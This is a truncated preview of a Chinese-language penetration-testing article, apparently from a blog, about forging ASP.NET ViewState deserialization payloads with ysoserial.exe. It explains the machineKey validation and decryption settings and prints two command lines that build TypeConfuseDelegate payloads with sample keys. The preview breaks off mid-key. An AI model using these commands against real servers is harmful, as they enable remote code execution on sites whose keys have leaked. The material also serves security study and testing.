文章预览
0x00 简介 在我们日常渗透活动中,在Web.config或者使用反射会见到几个常见的词: validationalg 、 decryptionalg 、 validationkey 、 decryptionkey 。其中validation是签名算法,decryption为加密解密算法,也就是说如果没有配置decryption那么其实我们的payload发送是明文发送的。 比如使用如下没有配置加密算法的生成 由于我们探究的是.net4框架下的生成,需要指定 generator ,如果是指定apppath和path不加参数islegacy则默认是4.5的算法。 ysoserial . exe - p ViewState - g TypeConfuseDelegate - c "echo 123 > c:\programdata\test.txt" -- generator = "D4124C05" -- validationalg = "HMACSHA256" -- validationkey = "34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF" 配置加密算法的生成 ysoserial . exe - p ViewState - g TypeConfuseDelegate - c "echo 123 > c:\programdata\test.txt" -- generator = "D4124C05" - decryptionalg = "AES" -- decryptionkey = "2F8F78
………………………………
